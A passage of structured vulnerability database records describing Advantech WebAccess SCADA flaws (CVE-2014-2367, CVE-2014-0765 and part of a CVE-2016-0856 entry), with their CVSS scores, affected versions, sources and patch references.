"ZDI", "id": "ZDI-16-063", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-092", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-072", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-083", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-093", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-073", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-102", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-082", "ident": null }, { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00434", "ident": null }, { "date": "2021-08-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-329", "ident": null }, { "date": "2024-11-21T02:42:31.017000", "db": "NVD", "id": "CVE-2016-0856", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-329" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess webvrpcs Service DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-16-094" }, { "db": "ZDI", "id": "ZDI-16-093" } ], "trust": 1.4 }, "type": { "_id": null, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-329" } ], "trust": 0.6 } }
var-201407-0236
Vulnerability from variot
The ChkCookie subroutine in an ActiveX control in broadweb/include/gChkCook.asp in Advantech WebAccess before 7.2 allows remote attackers to read arbitrary files via a crafted call. This vulnerability allows remote attackers to bypass authentication requirements on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the ChkCookieNoRedir function. By providing arbitrary values to certain fields, an attacker can receive a session authentication cookie despite receiving an error message. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. If you set user, proj, and scada are set and bwuser is true, you can access multiple restricted pages. This may aid in further attacks. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201407-0236", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "6.0" }, { "model": "webaccess", "scope": "lt", "trust": 1.4, "vendor": "advantech", "version": "7.2" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "7.1" }, { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "7.1" }, { "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "5.0" }, { "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "6.0" }, { "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "7.0" }, { "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "7d7fc402-463f-11e9-b23e-000c29342cb1" }, { "db": "IVD", "id": "e4a5d23c-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-249" }, { "db": "CNVD", "id": "CNVD-2014-04531" }, { "db": "JVNDB", "id": "JVNDB-2014-003490" }, { "db": "CNNVD", "id": "CNNVD-201407-479" }, { "db": "NVD", "id": "CVE-2014-2367" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-003490" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "John Leitch", "sources": [ { "db": "ZDI", "id": "ZDI-14-249" } ], "trust": 0.7 }, "cve": "CVE-2014-2367", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2014-2367", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2014-2367", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2014-04531", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "7d7fc402-463f-11e9-b23e-000c29342cb1", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "e4a5d23c-2351-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-70306", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-2367", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2014-2367", "trust": 0.8, "value": "Medium" }, { "author": "ZDI", "id": "CVE-2014-2367", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2014-04531", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201407-479", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "7d7fc402-463f-11e9-b23e-000c29342cb1", "trust": 0.2, "value": "MEDIUM" }, { "author": "IVD", "id": "e4a5d23c-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-70306", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "7d7fc402-463f-11e9-b23e-000c29342cb1" }, { "db": "IVD", "id": "e4a5d23c-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-249" }, { "db": "CNVD", "id": "CNVD-2014-04531" }, { "db": "VULHUB", "id": "VHN-70306" }, { "db": "JVNDB", "id": "JVNDB-2014-003490" }, { "db": "CNNVD", "id": "CNNVD-201407-479" }, { "db": "NVD", "id": "CVE-2014-2367" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The ChkCookie subroutine in an ActiveX control in broadweb/include/gChkCook.asp in Advantech WebAccess before 7.2 allows remote attackers to read arbitrary files via a crafted call. This vulnerability allows remote attackers to bypass authentication requirements on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the ChkCookieNoRedir function. By providing arbitrary values to certain fields, an attacker can receive a session authentication cookie despite receiving an error message. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. If you set user, proj, and scada are set and bwuser is true, you can access multiple restricted pages. This may aid in further attacks. \nAdvantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment", "sources": [ { "db": "NVD", "id": "CVE-2014-2367" }, { "db": "JVNDB", "id": "JVNDB-2014-003490" }, { "db": "ZDI", "id": "ZDI-14-249" }, { "db": "CNVD", "id": "CNVD-2014-04531" }, { "db": "BID", "id": "68716" }, { "db": "IVD", "id": "7d7fc402-463f-11e9-b23e-000c29342cb1" }, { "db": "IVD", "id": "e4a5d23c-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-70306" } ], "trust": 3.51 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-2367", "trust": 4.5 }, { "db": "ICS CERT", "id": "ICSA-14-198-02", "trust": 3.1 }, { "db": "CNNVD", "id": "CNNVD-201407-479", "trust": 1.1 }, { "db": "CNVD", "id": "CNVD-2014-04531", "trust": 1.0 }, { "db": "BID", "id": "68716", "trust": 1.0 }, { "db": "JVNDB", "id": "JVNDB-2014-003490", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-2079", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-14-249", "trust": 0.7 }, { "db": "IVD", "id": "7D7FC402-463F-11E9-B23E-000C29342CB1", "trust": 0.2 }, { "db": "IVD", "id": "E4A5D23C-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-70306", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "7d7fc402-463f-11e9-b23e-000c29342cb1" }, { "db": "IVD", "id": "e4a5d23c-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-249" }, { "db": "CNVD", "id": "CNVD-2014-04531" }, { "db": "VULHUB", "id": "VHN-70306" }, { "db": "BID", "id": "68716" }, { "db": "JVNDB", "id": "JVNDB-2014-003490" }, { "db": "CNNVD", "id": "CNNVD-201407-479" }, { "db": "NVD", "id": "CVE-2014-2367" } ] }, "id": "VAR-201407-0236", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "7d7fc402-463f-11e9-b23e-000c29342cb1" }, { "db": "IVD", "id": "e4a5d23c-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-04531" }, { "db": "VULHUB", "id": "VHN-70306" } ], "trust": 1.53470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.0 } ], "sources": [ { "db": "IVD", "id": "7d7fc402-463f-11e9-b23e-000c29342cb1" }, { "db": "IVD", "id": "e4a5d23c-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-04531" } ] }, "last_update_date": "2024-11-23T22:02:05.219000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Downloads ::: WebAccess Software", "trust": 0.8, "url": "http://webaccess.advantech.com/downloads.php?item=software" }, { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://webaccess.advantech.com/" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02" }, { "title": "Advantech WebAccess Remote Verification Bypass Vulnerability Patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/47826" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-249" }, { "db": "CNVD", "id": "CNVD-2014-04531" }, { "db": "JVNDB", "id": "JVNDB-2014-003490" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-200", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-70306" }, { "db": "JVNDB", "id": "JVNDB-2014-003490" }, { "db": "NVD", "id": "CVE-2014-2367" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.8, "url": "http://ics-cert.us-cert.gov/advisories/icsa-14-198-02" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2367" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-2367" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-249" }, { "db": "CNVD", "id": "CNVD-2014-04531" }, { "db": "VULHUB", "id": "VHN-70306" }, { "db": "JVNDB", "id": "JVNDB-2014-003490" }, { "db": "CNNVD", "id": "CNNVD-201407-479" }, { "db": "NVD", "id": "CVE-2014-2367" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "7d7fc402-463f-11e9-b23e-000c29342cb1" }, { "db": "IVD", "id": "e4a5d23c-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-249" }, { "db": "CNVD", "id": "CNVD-2014-04531" }, { "db": "VULHUB", "id": "VHN-70306" }, { "db": "BID", "id": "68716" }, { "db": "JVNDB", "id": "JVNDB-2014-003490" }, { "db": "CNNVD", "id": "CNNVD-201407-479" }, { "db": "NVD", "id": "CVE-2014-2367" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-07-24T00:00:00", "db": "IVD", "id": "7d7fc402-463f-11e9-b23e-000c29342cb1" }, { "date": "2014-07-24T00:00:00", "db": "IVD", "id": "e4a5d23c-2351-11e6-abef-000c29c66e3d" }, { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": "ZDI-14-249" }, { "date": "2014-07-24T00:00:00", "db": "CNVD", "id": "CNVD-2014-04531" }, { "date": "2014-07-19T00:00:00", "db": "VULHUB", "id": "VHN-70306" }, { "date": "2014-07-15T00:00:00", "db": "BID", "id": "68716" }, { "date": "2014-07-22T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-003490" }, { "date": "2014-07-24T00:00:00", "db": "CNNVD", "id": "CNNVD-201407-479" }, { "date": "2014-07-19T05:09:27.720000", "db": "NVD", "id": "CVE-2014-2367" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": "ZDI-14-249" }, { "date": "2014-07-24T00:00:00", "db": "CNVD", "id": "CNVD-2014-04531" }, { "date": "2014-07-23T00:00:00", "db": "VULHUB", "id": "VHN-70306" }, { "date": "2014-07-22T00:07:00", "db": "BID", "id": "68716" }, { "date": "2014-07-22T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-003490" }, { "date": "2014-07-24T00:00:00", "db": "CNNVD", "id": "CNNVD-201407-479" }, { "date": "2024-11-21T02:06:09.660000", "db": "NVD", "id": "CVE-2014-2367" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201407-479" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Remote Authentication Bypass Vulnerability", "sources": [ { "db": "IVD", "id": "7d7fc402-463f-11e9-b23e-000c29342cb1" }, { "db": "IVD", "id": "e4a5d23c-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-249" }, { "db": "CNVD", "id": "CNVD-2014-04531" } ], "trust": 1.7 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "information disclosure", "sources": [ { "db": "CNNVD", "id": "CNNVD-201407-479" } ], "trust": 0.6 } }
var-201404-0540
Vulnerability from variot
Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webvact.ocx ActiveX Control. The control does not check the length of an attacker-supplied GotoCmd string before copying it into a fixed length buffer on the stack. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There is a stack-based buffer overflow vulnerability in Advantech WebAccess 7.1 and earlier versions
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201404-0540", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "6.0" }, { "model": "webaccess", "scope": "eq", "trust": 1.2, "vendor": "advantech", "version": "7.1" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "7.1" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.2" }, { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "model": null, "scope": "eq", "trust": 0.6, "vendor": "advantech webaccess", "version": "5.0" }, { "model": null, "scope": "eq", "trust": 0.6, "vendor": "advantech webaccess", "version": "6.0" }, { "model": null, "scope": "eq", "trust": 0.6, "vendor": "advantech webaccess", "version": "7.0" }, { "model": null, "scope": "eq", "trust": 0.6, "vendor": "advantech webaccess", "version": "*" }, { "model": "broadwin webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.0" } ], "sources": [ { "db": "IVD", "id": "6e57a0f4-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7dc830-463f-11e9-b94d-000c29342cb1" }, { "db": "IVD", "id": "1685972e-2352-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-072" }, { "db": "CNVD", "id": "CNVD-2014-02270" }, { "db": "BID", "id": "66722" }, { "db": "JVNDB", "id": "JVNDB-2014-001976" }, { "db": "CNNVD", "id": "CNNVD-201404-171" }, { "db": "NVD", "id": "CVE-2014-0765" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-001976" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Tom Gallagher", "sources": [ { "db": "ZDI", "id": "ZDI-14-072" } ], "trust": 0.7 }, "cve": "CVE-2014-0765", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2014-0765", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 2.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2014-02270", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "6e57a0f4-1edf-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "7d7dc830-463f-11e9-b94d-000c29342cb1", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "1685972e-2352-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-68258", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-0765", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2014-0765", "trust": 0.8, "value": "High" }, { "author": "ZDI", "id": "CVE-2014-0765", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2014-02270", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201404-171", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "6e57a0f4-1edf-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "7d7dc830-463f-11e9-b94d-000c29342cb1", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "1685972e-2352-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-68258", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "6e57a0f4-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": 